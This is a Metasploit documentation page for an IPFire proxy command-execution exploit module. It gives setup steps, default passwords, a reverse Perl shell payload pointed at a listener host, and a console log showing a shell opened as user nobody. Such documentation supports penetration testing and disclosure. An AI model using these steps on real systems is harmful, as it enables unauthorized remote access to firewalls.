metasploit-framework/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md

1.5 KiB

Vulnerable Application

Official Source: ipfire Archived Copy: github

Verification Steps

  1. Install the firewall
  2. Start msfconsole
  3. Do: use exploit/linux/http/ipfire_proxy_exec
  4. Do: set password admin or whatever it was set to at install
  5. Do: set rhost 10.10.10.10
  6. Do: set payload cmd/unix/reverse_perl
  7. Do: set lhost 192.168.2.229
  8. Do: exploit
  9. You should get a shell.

Options

PASSWORD

Password is set at install. May be blank, 'admin', or 'ipfire'.

Scenarios

  msf > use exploit/linux/http/ipfire_proxy_exec
  msf exploit(ipfire_proxy_rce) > set password admin
  password => admin
  msf exploit(ipfire_proxy_rce) > set rhost 192.168.2.201
  rhost => 192.168.2.201
  msf exploit(ipfire_proxy_rce) > set payload cmd/unix/reverse_perl
  payload => cmd/unix/reverse_perl
  msf exploit(ipfire_proxy_rce) > set verbose true
  verbose => true
  msf exploit(ipfire_proxy_rce) > set lhost 192.168.2.229
  lhost => 192.168.2.229
  msf exploit(ipfire_proxy_rce) > exploit
  
  [*] Started reverse TCP handler on 192.168.2.229:4444 
  [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.201:49997) at 2016-05-30 10:09:39 -0400

  id
  uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
  whoami
  nobody